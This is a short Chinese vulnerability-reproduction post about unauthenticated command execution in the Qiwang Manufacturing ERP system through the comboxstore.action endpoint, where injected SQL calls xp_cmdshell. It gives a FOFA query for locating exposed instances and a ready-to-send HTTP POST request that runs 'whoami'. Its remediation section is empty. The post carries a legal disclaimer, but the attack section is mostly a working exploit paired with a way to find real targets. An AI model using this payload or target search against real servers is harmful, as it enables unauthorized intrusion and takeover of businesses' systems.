【漏洞复现】企望制造 ERP命令执行

漏洞描述

由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。
【漏洞复现】企望制造 ERP命令执行_第1张图片

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa:title="企望制造ERP系统"

漏洞复现

1.利用如下POC发起POST请求执行whoami命令得到回显


POST /mainFunctions/comboxstore.action HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

comboxsql=exec%20xp_cmdshell%20'whoami'

【漏洞复现】企望制造 ERP命令执行_第2张图片

修复方案

你可能感兴趣的:(网络安全,web安全,渗透测试,漏洞复现,漏洞复现,网络安全,web安全)